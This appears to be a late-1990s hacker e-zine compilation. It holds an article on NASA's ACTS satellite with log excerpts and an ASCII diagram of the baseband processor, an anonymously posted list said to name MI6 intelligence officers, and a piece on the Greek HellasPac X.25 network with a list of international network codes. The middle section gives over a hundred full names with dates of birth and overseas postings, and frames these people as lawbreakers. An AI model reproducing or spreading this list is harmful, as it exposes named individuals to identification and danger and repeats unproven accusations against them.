Term# Date Time Severity Subsystem Msg Type Msg# Alarm Text
___________________________________________________________________________
___________________________________________________________________________
3 8/23/99 9:22:23 S LBR 11 17 Traffic terminal #3
is synchronized
3 8/23/99 9:58:12 S LBR 10 33 East & west scan
beam refresh
sequence ended
3 8/23/99 10:12:13 S LBR 10 61 LBR EXECURE buffer
now available
3 8/23/99 10:45:43 E LBR 11 1 Traffic terminal #3
is at loss of
synchronization
state

This represents what happens when something goes wrong with anything in or on
the satellite. Now here all we have are minor problems that happen durring
the signaling of the satellite hence the "Traffic terminal #3 is at loss of
synchronization state".

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

The Following are of N channel circuit activity reports from the NASA
computer system. These represent successful and failed connection attempets
to the N channel Circuits:

N Channel Circuits - Successful Connections

Orig Start Circuit Call Destination Orig Channel Circuit Number
Term# Date Time Setup Duration Term# Number Type Channels
________________________________________________________________________________________
________________________________________________________________________________________
6 8/23/95 19:53:21 1 1049 6 4 1 2
6 8/23/95 19:58:57 2 87 1 2 2 2


N Channel Circuits - Failed Connections

Orig Start Circuit Destination Orig Channel Circuit Number Reject Reject
Term# Date Time Setup Term# Number Type Channels Code Reason
_____________________________________________________________________________________________
_____________________________________________________________________________________________
1 8/23/95 13:00:58 1 21 110 2 2 31 Destination Terminal Busy
1 8/23/95 15:33:46 1 2 787 2 24 41 Destination Terminal Shutdown


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Singale channel circuit Activity
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

This is a list of the connections of "Voice Channel" Activitys these show
the destiniation earth station numbers and the channel number also the
circuit type that failed or succeded well routering to the destination:

Voice Circuit-Successful Connections

Start Call Destination Orig Channel Circuit
Term# Date Time Duration Term# Number Type
______________________________________________________________________
______________________________________________________________________
1 8/23/95 10:35:54 33 6 786 2
1 8/23/95 12:07:58 38 2 786 2
1 8/23/95 19:06:23 600 2 786 2


Voice Circuit-Failed Connections

Start Orig Dest Orig Circuit Reject Reject
Date Time Term# Term# Channel# Type Reason Text
_____________________________________________________________________________
_____________________________________________________________________________
5/17/95 11:17:34 1 12 787 2 20 Satellite Busy:
Insufficient
Destination Uplink
Capacity

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
ACTS Anteana Reciver/Transiver
-=-=-=-=-=-=-=-=-=-===-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-

The ACTS satellite has 5 anteana's ports for use in uplink and downlink
testing and contstruction. This provides the MCS (Clevland Mater Control
Center) to be able to measure the signal quality and test new uploading/
downloading tekniques and features. And to provide multisignaling within new
projets of the ACTS.


=-=-=-=-=-=-=-=-=-
|BaseBand Processer|
-=-=-=-=-=-=-=-=-=

The Base Band Processer is the the mind of the communications routing
features such as Voice Procssing, Video Signals, and Call Routing. This
system provides many things to the end users of the satellite on Earth. It
is said to be equal to a 5ess-2000 switch, and provides Time Division
Multiplexing of Radion Signals of the uplink and downlink flexibility within
the family of signaling. The BBP is programmed to make compatability within
the messege routing system on heavy and slow days at work. The switching and
routing of messeges are moved around at 64-kbps hence the ISDN onboard.


---------\
\--------
---------- | |
---------- | ACTS |
-> /--------|
| ----------/
-- Anteana Ports


When a Signal is transmitted to an Anteana on the ACTS it is compressed and
when the BBP recieves it, it is almost simotaniously sent to the most unused
downlink at that time and routed down into the earth stations reciever where
from there it will be decompressed and sent on its way to reach its
destination on the PSTN.

Here is an example of what the BBP switch looks like with all of its routing
features marked:


---------------------------------------------------------- ---------- -----------------------------------------------
|INPUT CHANNEL 1 | | | | OUTPUT CHANNEL 1 |
| ____________ | | | | ------- |
|| | --------- | | | | | | |
|| DEMODS | | | | | | | |PING-PONG| /---------- |
||------------| |PING-PONG| | | | | --- |-- / --------- | |
|| 110/55 | | MEMORY |--- | | | | | -- MEMORY |--|| // || |
|| | ______| |-- | ------- | | | | || | 2K x | || || ------ || | DOWNLINK
|| MSPS | |------| 2K x | | | | || | | | || | 64 BITS | || || | | || ----- | BEAM
||------------| || | 64 BITS | | | | FEC || | BASBAND | | || --------- || || | FEC | || | | \ NO. 1
|| | || |--------- | | | |___| ROUTING |___|--| -------- | -- -- | || | || | \
|| | || | |______|DECODER|___ ___ --| | | | ------ENCODER-- --- MOD |---- /
|| | || ______ || | SWITCH | | || |PING-PONG| || | ------ 110/55|---- /
|| OR |-------- | | | || | | | || | |- | | | | MSPS || |/
|| | || | | |_______|| | | | || | MEMORY |--- ------ | ||
--> || | || --------- | | | | | | | --- 2K x | ------ |
--> ||------------| || | | | | | | | | ---| 64 BITS | |
Uplink || 27.5/13.75 | || |PING-PONG| | | | | | | --------- |
Beam || | ||_____| MEMORY |-- | | | | | |
1 || MSPS | ------- |--- | | | | |
||------------| | 2K X | | | | | |
||------------| | 64 BITS | | | | | |
|| 27.5/13.75 | |---------| | | | | |
|| | | | | | |
|| MSPS | | | *| | |
------------------------------------------------------------ |*--------- \ -----------------------------------------------
| \
| |
------------------------------------------------------------ | --------- | --------------------------------------------------
| || | | | | |
| INPUT CHANNEL 2 || | CENTRAL | | | OUTPUT CHANNEL (2) |
Uplink| ||_| | | | Identical to OUTPUT CHANNEL (1) |
Beam | (INDENTICAL TO INPUT CHANNEL 1) | |PROCESSER|- -| |
No. 2 | | | | | |
--> | | | | | |
---------------------------------------------------------- | | --------------------------------------------------
---------


-
This represents a signal uplinked to the satellites BBP system and what
functions are going on and how it handles the /voice/data/ and downlinks it
to the other subscriber of the ACTS terminal... The INPUT and OUTPUT channels
(2) are identical to the top ones in that they are just another anteana data
port for the enduser to connect to using his or her terminal...
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

The ACTS satellite will help satellite communications for years to come even
though it was supposed to be a 4 year sat. We have expanded and now are
learning a magnificent amount of data as the dawn of the millenium occurs
this information will lead us in the way or maybe we are leading our selfs
into just a big gigantic technological mess... these things we will never no
but untill we do... we shall keep advancing...

I leave you with The Satellite Accronym list provided by NASA:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
List of Abreveations thanks to NASA:
APPPENDIX A LIST OF ABBREVIATIONS
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


ACTS Advanced Communications Technology Satellite
BBP Baseband Processor
BER Bit Error Rate
BFN Beam Forming Network
Bps Bits Per Second
BPSK Binary Phase-Shift Keying
CDMA Code Division Multiple Access
CML Current Mode Logic
CMDS Commands
CMOS Complementary Metal Oxide Semiconductor
CR&T Command Ranging & Telemetry
DAMA Demand Assigned Multiple Access
DARPA Defense Advance Research Projects Agency
dB Decibel
D/C Down converter
DCU Digital Control Unit
ECL Emitter Controlled Logic
FDM Frequency Division Multiplexing
FDMA Frequency Division Multiple Access
FEC Forward Error Correction
FET Field Effect Transistor
Gbps Gigabits Per Second
GHz Gigahertz
HDR High Date Rate
HEMT High Electron Mobile Transistor
IBOW In Bound Order Wire
IF Intermediate Frequency
Kbps Kilobits Per Second
LSI Large Scale Integration
ms millisecond
MBA Multiple Beam Antenna
Mbps Megabits Per Second
MCS Master Control Station
MOSAIC Motorola Oxide Self-Aligned Implanted Circuit
MSM Microwave Switch Matrix
MSPS Mega Symbols Per Second
NASA National Aeronautics & Space Administration
NMT Network Management Terminal
ns Nanosecond
OBOW Out Bound Order Wire
OC Optical Carrier
QPSK Quaternary Phase Shift Keying
RCSA Receive Coax Switch Assembly
RF Radio Frequency
SMSK Serial Minimum Shift Keying
SNMP Simple Network Management Protocol
SONET Synchronous Optical Network
SQPSK Staggered Quaternary Phase Shift Keying
SSI Small Scale Integration
TCSA Transmit Coax Switch Assembly
TDM Time Division Multiplexing
TDMA Time Division Multiple Access
TEW Tracking Error Word
TLM Telemetry
TT&C Telemetry, Tracking & Command
TWTA Traveling Wave Tube Amplifier
U/C Up converter
VSAT Very Small Aperture Terminal
WIRS Waveguide Input Redundancy Switch
WORS Waveguide Output Redundancy Switch

written by lowtek ----> lowtek@deadprotocol.org
-----------------

This file was written mostly with public information

the signals are upon us...
and i am here to feed them


-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ Mi5 list ]:::::::::::::[OO--[ by anon ]---[ xxx@anon.isp.ee ]::::::
-->[OO]:::::::::::::::::::::::::::::::[ http://somwhere.com ]::::::::::::::::


From: anxxxxxx@anon.isp.ee
Reply To: anxxxxxx@anon.isp.ee
Subject:none

This message is sent by someone who prefers to remain anonymous
To reply to her/him use following address:
anxxxxxx@anon.isp.ee
In case of spam or any other type of abuse please inform us
http://anon.isp.ee/feedback/
Service provided by http://www.isp.ee
---------------
The attached list identifies the unprincipled and unscrupulous individuals
involved with MI6 worldwide. The list was produced by an honest man who has
since left MI6 because he felt that the behaviour of that organisation was
unacceptable in a civilised society. They are accountable to nobody for their
law breaking activities. They are subordinated to the elite people of this
country, for example the Royal household and the establishment.

The whole world should be aware of these individuals and their capabilities.
British citizens need to know that these people are supported by those ruling
this country. This "Al Capone" style organisation has removed the human
rights of ordinary people, not only in this country but worldwide.

Names

Dudley Charles Ankerson: 78 Buenos Aires, 85 Mexico, 93 Madrid; dob 1948; Dr.
Raymond Benedict Barthol Asquith: 83 Moscow, 92 Kiev; dob 1952; Viscount.
Kerry Charles Bagshaw: 82 Geneva, 88 Moscow; dob 1943; OBE.
Ian Clive Barnard: 94 Geneva; dob 1965.
Richard Martin Donne Barrett: 83 Ankara, 88 New York, 97 Amman; dob 1949.
James Lloyd Baxendale: 94 Cairo (MECAS), 97 Amman; dob 1967.
Jonathan Beales.
Peter John William Black: 74 MECAS, 77 Kuwait, 80 Amman, 87 Dhaka; dob 1946.
Jamie Blount.
Rupert Bowen: 90 Windhoek, 92 Tirana.
Andrew Jonathan Corrie Boyd: 81 Accra, 88 Mexico City, 96 Islamabad; dob 1950
Andrew James Brear: 94 Santiago; dob 1960.
Christopher Mark Breeze: 88 Nicosia, 94 New Delhi; dob 1963.
Alastair Breeze.
Richard Philip Bridge: 86 Warsaw, 88 Moscow; dob 1959.
Stuart Armitage Brooks: 72 Rio, 75 Lisbon, 79 Moscow, 87 Stockholm, 93
Moscow; dob 1948; OBE.
Christopher Parker Burrows: 82 East Berlin, 87 Bonn, 93 Athens; dob 1958.
George Benedict Joseph P Busby: 89 Bonn, 92 Belgrade; dob 1960; OBE.
Geoff Chittenden.
Robert John Paul Church: 76 Bankok, 81 Berlin, 86 Nairobi, 89 Bangkok, 97
Nairobi; dob 1947.
Timothy Clayden: 91 Warsaw, 95 Lagos; dob 1960; Wanker.
Martin Hugh Clements: 86 Tehran, 90 Vienna; dob 1961.
John Donovan Nelson Clibborn: 66 Nicosia, 72 Bonn, 72 Brussels, 88
Washington; dob 1941; CMG.
Peter Salmon Collecot: 80 Khartoum, 82 Canberra, 93 Jakarta; dob 1950.
Andrew David Cordery: 75 Nairobi, 77 New York, 84 Lusaka, 88 Berlin, 95 Oslo;
dob 1947.
Sherard Louis Cowper-Coles: 80 Cairo, 87 Washington; dob 1955; CMG, LVO.
Keith Craig: dob 1961.
John Martin Jamie Darke: 88 Cairo, 96 Dubai; dob 1953.
Michael Hayward Davenport: 89 Warsaw, 96 Moscow; dob 1961.
Peter Brian Davies: 83 Rome, 88 Peking, 96 Jakarta; dob 1954,
Richard Billing Dearlove: 68 Nairobi, 73 Prague, 80 Paris, 87 Geneva, 91
Washington; dob 1945; OBE.
John Deerlove.
Keith Derek Evetts: 75 Warsaw, 77 Maputo, 83 New York, 86 Kingston, 88
Lisbon; dob 1948; OBE.
Michael Edward Joseph Feliks: 93 Peking; dob 1964; Dr.
Robert Dominic Russell Fenn: 85 Hague, 88 Lagos, 92 New York; dob 1962.
Nicholas Bernard Frank Fishwick: 88 Lagos, 94 Istanbul; dob 1958; Dr.
Richard George Hopper Fletcher: 68 Athens, 69 Nicosia, 73 Bucharest, 85
Athens; dob 1944; CMG.
Richard Andrew Foulsham: 84 Brunei, 86 Lagos, 95 Rome; dob 1950.
Rosalind Mary Elizabeth Fowler: 90 Hong Kong; dob 1965.
Michael Roger Fox: 93 Geneva; dob 1958.
Richard Ogilby Leslie Fraser-Darling: 73 Helsinki, 84 Washington; dob 1949.
Robert Andrew Fulton: 69 Saigon, 73 Rome, 78 Berlin, 84 Oslo, 89 New York;
dob 1944.
Kevin Andrew Garvey: 81 Bangkok, 85 Hanoi, 92 Phnom Penh; dob 1960.
John Henry Cary Gerson: 69 Hong Kong, 71 Singapore, 74 Peking, 87 Hong Kong;
dob 1945.
Andrew Patrick Somerset Gibbs: 79 Rio, 84 Moscow, 87 Pretoria; dob 1951; OBE.
Sean Goodman.
Anita Goodman.
Jacqueline Goodman.
Keith Rutherford Gosling: 75 Singapore, 78 Vienna, 86 Manila, 93 Tel Aviv;
dob 1944; OBE.
Roger Patrick Hamilton: 78 Jakarta, 82 Tokyo, 84 Hong Kong, 89 Copenhagen;
dob 1948.
Roger John Hargreaves: 73 Hong Kong, 76 Sanaa, 85 Hong Kong, 96
Wellington; dob 1950.
Samuel Andrew Roland Hatfield: 95 Lagos; dob 1963.
Steven John Hill: 88 Vienna, 96 New York; dob 1962.
Katherine Sarah-Julia Horner: 85 Moscow, 97 Moscow; dob 1952.
Thomas Rober Benedict Hurd: 95 Warsaw; dob 1964.
Robert Mitchell Forest Kelly: 74 Nairobi, 80 Turkey, 81 Ankara, 95 Ottowa;
dob 1946.
Theodore Maurice Kenwrick-Pierc: 74 Brussels, 82 Nicosia, 88 Hague, 94
Athens; dob 1948.
Alex Kershaw: 97 Geneva; dob 1967.
Nicholas John Andrew Langman: 86 Montevideo, 88 New York, 94 Paris; dob 1960.
Edmund John Scott Latter: 94 Istanbul; dob 1968.
Jeremy John Legge: 87 Lusaka, 94 Vienna; dob 1961.
Gareth Geoffrey Lungley: dob 1971.
Christine Anne MacQueen: 84 Brasilia, 89 New York, 90 Paris; dob 1959.
Norman James MacSween: 72 Nairobi, 77 Tehran, 83 Bonn, 91 Stockholm, 95
Moscow; dob 1948.
Iain Arthur Gray Matthewson: 81 New York, 85 Warsaw, 93 Prague; dob 1952.
Ian Forbes McCredie: 76f Lusaka, 79 Tehran, 83 Copenhagen, 92 New York; dob
1950; OBE.
Patrick Joseph McGuinness: 88 Sanaa, 94 Abu Dhabi, 96 Cairo; dob 1963; OBE.
Justin James McKenzie Smit: 96 Moscow; dob 1969.
William John Clovis Meath-Baker: 88 Kabul, 89 Prague, 97 Istanbul; dob 1959.
Andrew Jonathan Mitchell: 93 Bonn; dob 1967.
Anthony Leopold Colyer Monckton: 90 Geneva, 96 Zagreb; dob 1960.
Richard Peter Moore: 90 Ankara, 91 Istanbul, 95 Islamabad; dob 1963.
Mark Scott Thomas Morgan: 84 Geneva, 88 Aden, 94 Valletta; dob 1958; MBE.
Stuart Richard Morley: 89 San Jose, 90 Bridgetown, 96 Hague; dob 1959.
Clive Dare Newell: 79 Tehran, 82 Kabul, 86 Addis, 90 Bosnia, 94
Ankara; dob 1953.
Peter James Norris: 85 Lagos, 90 Guatemala; dob 1955, Dr.
Peter David Orwin: 77 Athens, 84 Brasilia, 89 Tel Aviv, 96 Hague; dob 1944;
OBE, MC.
Christopher Robert Geoffrey Pagett: 78 Havana, 79 Lusaka, 88 Maputo, 97 New
York; dob 1952; OBE.
Colin Douglas Partridge: 80 Delhi, 87 Hanoi, 94 Hong Kong; dob 1955.
Martin Eric Penton-Voak: 95 Moscow; dob 1965.
Geoffrey Colin Perry: 81 Hong Kong, 92 Geneva; dob 1951.
Alan Petty.
Richard William Potter: 85 Riyadh, 88 Nicosia; dob 1960.
Mark Precious: Buenos Aires 86; dob 1960.
John Andrew Raine: 88 Kuwait, 94 Damascus, 97 Riyadh; dob 1962.
Michael Charles Ramscar: 77 Lagos, 79 Brasilia, 86 Madrid, 89 San Jose, 97
Madrid; dob 1948.
Timothy Simeon Rawlinson: 91 Lagos, 96 Stockholm; dob 1962.
Richard Robert Reeve: 73 Singapore, 77 Hong Kong, 83 Hong Kong; dob 1948.
Michael John Regan: 86 Kabul, 89 Dubai, 95 Bangkok; dob 1955.
Peter Marius Julian Prows Reilly: 96 Khartoum; dob 1971.
John Ridd.
Janet Elizabeth Rogan: 91 Peking, 98 Sarajevo; dob 1962.
John McLeod Scarlett: 73 Nairobi, 76 Moscow, 84 Paris, 91 Moscow; dob 1948;
OBE.
Deborah Jane Soothill: 96 Peking; dob 1969.
Richard David Spearman: 92 Istanbul, 97 Paris; dob 1960.
David Spedding.
Guy David St. John Kelso Spindler: 87 Moscow, 97 Pretoria; dob 1962.
Andrew Jeremy Stafford: 77 Stockholm, 79 Accra, 84 Prague, 91
Brussels; dob 1953.
Christopher David Steele: 90 Moscow; dob 1964.
Geoffrey Tantum.
Anthony Jonathan Terry: 70 Nairobi, 73 Havana, 79 Belgrade, 86
Santiago, 97 Geneva; dob 1946.
Richard Paul Reynier Thompson: 91 Stockholm, 96 Geneva; dob 1960.
Michael Thomson.
Daniel Vernon Thornton: 95 Brussels; dob 1969.
Stuart Graham Turvill: 95 Islamabad; dob 1971.
John Venning.
Richard Vlaistow: 95 Havana.
James Spencer Kennedy Watson: 91 Kuwait, 97 Damascus; dob 1964.
Andrew Whiteside: 95 Budapest; dob 1968.
Mark Williams: 95 Tehran.
Kenneth Mark Williams: 76 Kuala Lumpur, 79 Bridgetown, 88 Harare, 94 Delhi;
dob 1944.
Simon Jules Wilson: 91 Athens, 93 Zagreb; dob 1966; OBE.
Julian Paul Geoffrey Wiseman: 78 Geneva, 84 Dhaka, 90 Islamabad; dob 1944.
David John Woods: 78 Vienna, 81 Bucharest, 92 Harare, 97 Pretoria; dob 1951.
Ian Alexander Woods: 77 New York, 84 Berlin, 86 Bonn, 95 Warsaw; dob 1951.
Alexander William Younger: 95 Vienna; dob 1963.
-----------------

[ hmm ]


-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ HELLASPAC ]::::::::::::[OO--[ by monty ]---[ ]::::::::::::::::::::
-->[OO]:::::::::::::::::::::::::::::::[ ]:::::::::::::::::::::::::::::::::::


Introduction:
~~~~~~~~~~~~~~~
Well here I am, back again. I've started writing a series of articles
about telephone systems and anything that is worth playing with. First
I 'd like you to think if you have anything worth publishing. If you do
then write an article and publish it, if you don't then find a subject
and write about it. All i mean is that you should gather the information
that you have and publish them. You never know who will you help. Maybe
you have information that are useless for you but helpfull for guys in
other countries. Well by saying this i don't mean that you should all
start writting about programming ess etc..etc..etc.. Hmm.. I was thinking
of something newer. You may not have any knowledge on new systems tho
you can get a book and sam the infoz that it has in a phile. Most of
the philes that will be published are information that i have collected
from books, from the net and from my telco. You should do the same.

Some General zhiTz:
~~~~~~~~~~~~~~~~~~~~~
HellasPac is an independant network which has it's own subscribers plus
it has it's own network-bones. It's main disadvantage is that it uses the
PSTN or leased lines (0 - 3 KHz) to communicate so it is kinda slow. The
Hellaspac as all the networks has its own centers (terminals) that
communicate with the subscriber and with the other centers(bones).
The communication between the centers is independed from the data rate
of each terminal. This is done with packet roaming. Each terminal "cuts"
the packets that it wants to send in a pre-defined size. Then the terminal
counts the packets and puts in every packet the number of the receiver and
then send them in the center with its own speed.
The center receives each packet, it "saves" it in its memory and then
it sends it in the another center-receiver with the speed that the centers
have. At the end to center-receiver "saves" the packet and sends it to
the final receiver (your computer) with the speed that you have. Thus the
terminals have different speeds in the network.


Hellaspac Centers
~~~~~~~~~~~~~~~~~~~
Hellaspac is connected to the PSDN (Packet Switched Public Data Network)
of other countries, and of course their subscribers. In Greece there are
8 centers (in Athens, Pireus, Heraklio, Tripoli, Patra, Lamia, Thessaloniki
and Kabala). Each center covers an area so that the network could cover
all Greek towns.


Connections with Hellaspac:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
There are 2 different ways to connect with Hellaspac.
1) A permanent connection between your computer and the Hellaspac's terminal
(you can call and be called)
2) A connection between your computer and the Hellaspac's terminal (you can
only call)

Hellaspac accepts two kinds of terminals, asynchronous (packet terminals)
and synchronous (character terminals).

Synchronous terminals are computers or "smart" terminals that are able
to "cut" the data packet they want to send. This is done under the X.25
recommendation of the CCIT. That's why the asynchronous terminals are also
called X.25 terminals.
The connection between a synchronous terminal ends in the PAD which is
explained in the next paragraph. Now about the communication between the
synchronous terminals and the PAD is described in the X.29 rerommendation
of the CCIT.

The asynchronous terminals are usually simple terminals or the type of
start-stop terminals. These terminals can't cut the data packets. The
connection between an asynchronous terminal ends up in a special
assembling - disassembling packet structure at the center. These structures
are called Hellaspac PAD (Packet Assembler - Disassembler).
The asynchronous terminal connection in the PAD is being described by X.28
recommendation of the CCIT and the convenience of the PAD in the terminal
is described by the X.3 of the CCIT. Now the connection of the PAD with the
synchronous terminal. The communication of the asynchronous terminals
through the packet network is known as the triple X communication
(X.3 - X.28 - X.29). A little ascii (excuse ma lame ascii art)
scheme right above:


|~~~~~~~~~~~~~~~~|
| Asynchronous |
| Terminal |
|________________|
|
|
|X.28
|
|
|
|~~~~~~~| |~~~~~~~~|
| PAD |___X.29________| Center |
|_______| |________|
| |
| |
| |
|X.29 |X.25
| |
|~~~~~~~~| |
| Center |-----X.25----------|~~~~~~~~~~~~~|
|________| | Synchronous |
| Terminal |
|_____________|


Of course the subscriber's computer will connect with its modem to the
modem of the center.. Well if that isn't obvious for you then you better
stop reading this phile. Damn now that i thought of it again, let me say
some things about the modem. You all know what it is, the modem transforms
the multi-outline of the terminal in a 2-lined or 4-lined exit under V.24
recommendation of the CCITT also known as RS-232C. Of course the speed of
the line depends of the speed of the modem (bit per second).


Numbering in Hellaspac of the perm terminals:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(Methods, datagram and virtual circuits)

For national calls the number of a permanent connected subscriber has
this format: 2ABCDEFGH
wherever A,B,C,D,E,F,G,H are digits from 0 to 9.
Greece's DNIC (Datapack International Identification Code) is 202. So
if you want to call a perm connected subscriber in Greece from another
country you should connect to the number 2022ABCDEFGH.
Now a list with DNIC numbers will follow. I haven't checked the whole
list so if anyone finds something that doesn't work please send me a mail.



Service - DATAPAC INTERNATIONAL IDENTIFICATION CODES (DNIC)


COUNTRY NETWORK DNIC DIRECTION
------- ------- ---- ---------
ALGERIA DZPAC 6030 BI-DIR
ANGOLA EPTEL 6315 BI-DIR
ANDORRA ANDORPAC 2945 BI-DIR
ANTIGUA AGANET 3443 INCOMING
ARGENTINA ARPAC 7220 BI-DIR
TELINTAR 7221 BI-DIR
ARPAC 7222 BI-DIR
EASYGATE 7223 BI-DIR
COMPUSERVER 7224 BI-DIR
ARMENIA ARMEM
AUSTRIA DATEX-P 2322 BI-DIR
DATEX-P TTX 2323 BI-DIR
RADAUS 2329 BI-DIR
AUSTRALIA AUSTPAC 5052 BI-DIR
OTC DATA ACCESS 5053 BI-DIR
AUSTPAC 5054 BI-DIR
AUSTPAC 5057 BI-DIR
AZORES TELEPAC 2680 BI-DIR
BAHAMAS BATELCO 3640 BI-DIR
BAHRAIN BAHNET 4263 BI-DIR
BARBADOS CARIBNET 3422 BI-DIR
IDAS 3423 BI-DIR
BELARUS BELPAK 2570 BI-DIR
BELGIUM DCS 2062 BI-DIR
DCS-TELEX 2068 BI-DIR
DCS-PSTN 2069 BI-DIR
BELIZE BTLDATAPAC 7020 BI-DIR
BENIN BENINPAC 6162 BI-DIR
BERMUDA BERMUDANET 3503 BI-DIR
BRAZIL INTERDATA 7240 BI-DIR
RENPAC 7241 BI-DIR
RENPAC 7248 INCOMING
RENPAC 7249 INCOMING
TELERJ 7242 BI-DIR
MINASDATA 7243 BI-DIR
TELESC 7244 BI-DIR
BRAZILIAN 7246 BI-DIR
DATASAT BL 7247 BI-DIR
TELESP 7251 BI-DIR
TELESJ&TEREST 7252 BI-DIR
TELEMIG 7253 BI-DIR
TELEPAR 7254 BI-DIR
CRT 7255 BI-DIR
WEST&MIDWEST 7256 BI-DIR
TELEBAHIA 7257 BI-DIR
NORTHEST 7258 BI-DIR
NORTHERN 7259 BI-DIR
BULGARIA BULPAC 2841 BI-DIR
BURKINA FASO BURKIPAC 6132 BI-DIR
CAMEROON CAMPAC 6242 BI-DIR
CAYMAN ISLANDS IDAS 3463 BI-DIR
CHAD CHADPAC 6222 BI-DIR
CHILE ENTEL 7302 BI-DIR
CHILE-PAC 7303 BI-DIR
VTRNET 7305 BI-DIR
CHINA PTELCOM 4600 BI-DIR
CHINAPAK 4602 BI-DIR
CHINAPAK 4603 BI-DIR
COLOMBIA COLDAPAQ 7320 BI-DIR
COLDAPAQ 7322 BI-DIR
COSTA RICA RACSAPAC 7120 BI-DIR
RACSAPAC 7122 BI-DIR
RACSAPAC 7128 BI-DIR
RACSAPAC 7129 BI-DIR
CROATIA CROAPAK 2191 BI-DIR
CUBA CUBA 2329 BI-DIR
CUBANET 3682 BI-DIR
CURACAO DATANET-1 3621 BI-DIR
CYPRUS CYTAPAC 2802 BI-DIR
CYTAPAC 2807 BI-DIR
CYTAPAC 2808 BI-DIR
CYTAPAC 2809 BI-DIR
DENMARK DATAPAK 2382 BI-DIR
DATAPAK 2383 BI-DIR
DJIBOUTI STIPAC 6382 BI-DIR
DOMINICAN REP. UDTS-I 3701 INCOMING
EGYPT ARENTO 6020 BI-DIR
ESTONIA ESTPAC 2480 BI-DIR
FIJI FINTEL 5420 BI-DIR
FIJINET 5421 BI-DIR
FINLAND DATAPAK 2441 BI-DIR
DATAPAK 2442 BI-DIR
DATAPAK 9358 BI-DIR
DIGIPAK 2443 BI-DIR
FRANCE TRANSPAC 2080 BI-DIR
NTI 2081 BI-DIR
TRANSPAC 2089 BI-DIR
TRANSPAC 9330 INCOMING
TRANSPAC 9331 INCOMING
TRANSPAC 9332 INCOMING
TRANSPAC 9333 INCOMING
TRANSPAC 9334 INCOMING
TRANSPAC 9335 INCOMING
TRANSPAC 9336 INCOMING
TRANSPAC 9337 INCOMING
TRANSPAC 9338 INCOMING
TRANSPAC 9339 INCOMING
FR ANTILLIES TRANSPAC 2080 BI-DIR
FR GUIANA TRANSPAC 2080 BI-DIR
FR POLYNESIA TOMPAC 5470 BI-DIR
GABON GABONPAC 6280 BI-DIR
GABOBPAC 6282 BI-DIR
GERMANY F.R. ISDN/X.25 2621 BI-DIR
DATEX-P 2624 BI-DIR
DATEX-C 2627 BI-DIR
DATEX 2648 BI-DIR
PSN 2652 BI-DIR
TNET 2654 BI-DIR
GREECE HELLASPAC 2023 BI-DIR
GREENLAND KANUPAX 2901 BI-DIR
GUAM LSDS 5350 BI-DIR
LSDS 5351 BI-DIR
GUATEMALA MAYAPAQ 7042 BI-DIR
GUATEL 7043 INCOMING
HAWAII HAWAIITEL 3152 BI-DIR
HONDURAS HONDUTEL 7080 INCOMING
HONDUTEL 7089 BI-DIR
HONG KONG HUTCHISON 4541 BI-DIR
INTELPAK 4542 BI-DIR
NEW T&T 4543 BI-DIR
DATAPAK 4545 BI-DIR
HUTCHPAK 4546 BI-DIR
NEW WORLD 4547 BI-DIR
HUNGARY DATEX-P 2160 BI-DIR
DATEX-P 2161 BI-DIR
ICELAND ICEPAK 2740 BI-DIR
INDIA GPSS 4042 BI-DIR
RABMN 4041 BI-DIR
I-NET 4043 BI-DIR
I-NET 4049 BI-DIR
INDONESIA SKDP 5101 BI-DIR
IRAN IRANPAC 4321 BI-DIR
IRELAND EIRPAC 2721 BI-DIR
EIRPAC 2724 BI-DIR
POSTNET 2728 BI-DIR
ISRAEL ISRANET 4251 BI-DIR
ITALY DARDO 2222 BI-DIR
ITACABLE 2226 BI-DIR
ITAPAC 2227 BI-DIR
IVORY COAST SYTRANPAC 6122 BI-DIR
JAMAICA JAMINTEL 3380 INCOMING
JAPAN GLOBALNET 4400 BI-DIR
DDX 4401 BI-DIR
JENSNET-P 4403 BI-DIR
NIS-NET 4406 BI-DIR
VENUS-P 4408 BI-DIR
VENUS-P 9955 INCOMIMG
VENUS-C 4409 BI-DIR
NI+CI 4410 BI-DIR
KENYA KENPAC 6390 BI-DIR
KOREA REP HINET-P 4500 BI-DIR
DACOM-NET 4501 BI-DIR
KUWAIT BAHNET 4263 BI-DIR
LATVIA LATTELECOM 2471 BI-DIR
LEBANON LEBONPAC 4150 BI-DIR
SODETEL 4155 BI-DIR
LIECHTENSTEIN TELEPAC 2284 BI-DIR
TELEPAC 2289 BI-DIR
LUXEMBOURG LUXPAC 2704 BI-DIR
LUXPAC 2709 BI-DIR
TELETEX 2705 BI-DIR
TELETEX 2707 BI-DIR
TELETEX 2708 BI-DIR
MACAU MACAUPAC 4550 BI-DIR
MADAGASCAR INFOPAC 6460 BI-DIR
MADEIRA TELEPAC 2680 BI-DIR
MALAYSIA MAYPAC 5021 BI-DIR
MALDIVES DATANET 4720 BI-DIR
MALI MALIPAC 6102 BI-DIR
MALTA TELEMALTA 2782 BI-DIR
MAURITIUS MAURIDATA 6170 BI-DIR
MEXICO TELEPAC 3340 BI-DIR
TELNORPAC 3345 BI-DIR
TYMPAQ 3346 BI-DIR
SERV.DE INFRAES 3347 BI-DIR
INTERSYS 3348 BI-DIR
INTELCOM 3349 BI-DIR
MOROCCO MOROCCO 6040 BI-DIR
MOROCCO 6041 BI-DIR
MAGHRIPAC 6042 BI-DIR
MOROCCO 6049 BI-DIR
MOZAMBIQUE TELEDATA 6435 BI-DIR
